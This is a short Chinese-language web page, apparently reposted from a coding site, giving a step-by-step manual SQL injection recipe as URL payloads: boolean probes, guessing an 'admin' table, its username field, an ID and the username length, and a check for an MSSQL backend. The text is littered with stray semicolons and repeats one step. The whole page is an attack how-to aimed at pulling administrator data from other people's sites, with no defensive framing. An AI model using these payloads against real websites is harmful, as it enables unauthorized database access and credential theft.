sql注入检测:手工检测可否注入的大致经过
疯狂代码 http://CrazyCoder.cn/ ĵ:http:/CrazyCoder.cn/Security/Article72618.html
□ ;检测可否注入 ;
; ;
http://url/xx?id=1111 ;and ;1=1 ;(正常页面) ;
http://url/xx?id=1111 ;and ;1=2 ;(出错页面) ;
; ;
□ ;检测表段 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;* ;from ;admin) ; ;
; ;
□ ;检测字段 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;username ;from ;admin) ; ;
; ;
□ ;检测ID ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;ID=1) ;
; ;
□ ;检测长度 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;len(username)=5 ;and ;ID=1) ; ;
; ;
□ ;检测长度 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;len(username)=5 ;and ;ID=1) ; ;
; ;
□ ;检测是否为MSSQL数据库 ;
; ;
http://url/xx?id=1111 ;and ;exists ;(select ;* ;from ;sysobjects) ;
评论1
最新资源